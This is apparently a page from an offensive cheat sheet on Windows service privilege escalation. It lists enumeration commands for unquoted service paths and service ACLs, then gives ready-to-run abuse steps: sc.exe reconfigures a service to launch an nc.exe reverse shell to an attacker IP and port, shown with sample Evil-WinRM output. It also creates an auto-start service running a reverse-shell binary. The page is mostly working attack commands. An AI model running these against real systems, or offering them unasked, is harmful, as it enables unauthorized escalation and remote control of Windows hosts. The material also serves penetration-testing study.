TLDRBins TLDRBins / Windows Services

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Check unquoted service path

cmd.exe /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """'

Sample Output:
PS C:\Users\user1> cmd.exe /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """'
WC Assistant    WCAssistantService    C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe    Auto

Check service ACLs

. .\Get-ServiceAcl

Sample Output:
TO-DO
"<SERVICE>" | Get-ServiceAcl | Select -ExpandProperty Access

Sample Output:
PS > "SomeService" | Get-ServiceAcl | select -ExpandProperty Access

...[SNIP]...

ServiceRights     : QueryConfig, ChangeConfig, QueryStatus, EnumerateDependents, Start, Stop, Interrogate, ReadControl
AccessControlType : AccessAllowed
IdentityReference : COMPUTER-MS01\user
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None

...[SNIP]...

Ref: Get-ServiceAcl.ps1

Abuse #1: Change service path

1. Change service path

# Assume nc.exe is uploaded
sc.exe config <SERVICE> binPath= "C:\ProgramData\nc.exe -e cmd.exe <LOCAL_IP> <LOCAL_PORT>"

Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe config VSS binpath="C:\windows\tasks\nc.exe -e cmd 10.10.14.44 443"
[SC] ChangeServiceConfig SUCCESS

2. Restart service

# Stop service
sc.exe stop <SERVICE>

Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe stop VSS
[SC] ControlService FAILED 1062:

The service has not been started.

# Start service
sc.exe start <SERVICE>

Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe start VSS
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Additional: Create service

# Create a service
sc.exe create <NEW_SERVICE> binpath= C:\ProgramData\rev.exe start= auto

Sample Output:
TO-DO

Note: there is a space after named arguments